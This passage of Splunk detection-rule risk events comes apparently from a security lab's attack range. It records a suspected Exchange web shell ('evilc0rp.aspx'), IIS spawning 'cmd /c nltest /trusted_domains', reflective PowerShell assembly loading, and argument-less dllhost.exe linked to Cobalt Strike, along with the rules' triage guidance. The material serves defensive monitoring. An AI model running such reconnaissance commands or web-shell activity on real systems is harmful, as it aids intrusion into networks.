($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T09:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T09:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664880231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="264", dest="exchange01.attackrange.local", firstTime="2022-10-04T08:52:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T09:22:07", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", process_name="powershell.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664880231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="4", dest="exchange01.attackrange.local", firstTime="2022-10-04T08:52:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T09:22:07", original_file_name="Cmd.Exe", parent_process="c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipmb991e788-0137-49d8-bf80-6e84f2791064 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w \"\" -m 0", process="cmd /c nltest /trusted_domains", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="SYSTEM" 1664880231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="4", dest="exchange01.attackrange.local", firstTime="2022-10-04T08:52:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T09:22:07", original_file_name="unknown", parent_process="C:\\Windows\\System32\\inetsrv\\w3wp.exe", process="C:\\Windows\\System32\\cmd.exe /c nltest /trusted_domains", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="EXCHANGE01$" 1664874000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664874000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5004", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664874000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664874000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="20816", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664874000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664874000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5150", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664874000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664874000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x138c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664870400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664870400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="14716", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664870400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664870400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x397c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664878159, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-04 08:52:00.695", file_name="evilc0rp.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\evilc0rp.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - evilc0rp.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="evilc0rp.aspx", threat_object_type="file name" 1664877331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T08:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T08:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664877331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T08:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T08:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664877331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir 